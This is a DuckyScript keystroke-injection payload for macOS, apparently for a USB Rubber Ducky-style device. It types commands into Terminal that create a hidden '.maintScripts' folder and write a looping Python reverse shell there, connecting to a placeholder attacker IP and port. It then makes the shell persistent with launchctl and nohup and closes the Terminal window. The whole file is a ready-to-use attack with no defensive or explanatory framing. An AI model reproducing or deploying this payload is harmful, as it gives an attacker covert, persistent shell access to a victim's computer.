GUI SPACE
DELAY 500
STRING terminal
DELAY 400
ENTER
DELAY 1000
STRING cd ~
ENTER
STRING mkdir .maintScripts
ENTER
STRING cd .maintScripts
ENTER
STRING echo "while true; do sleep 5 && python -c 'import socket,subprocess,os;
STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
STRING s.connect((\"attackerip\",attackerport));
STRING os.dup2(s.fileno(),0); 
STRING os.dup2(s.fileno(),1); 
STRING os.dup2(s.fileno(),2);
STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'; done" > script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/.maintScripts/script.sh
ENTER
STRING nohup ./script.sh&
ENTER
STRING exit
ENTER
DELAY 400
GUI q
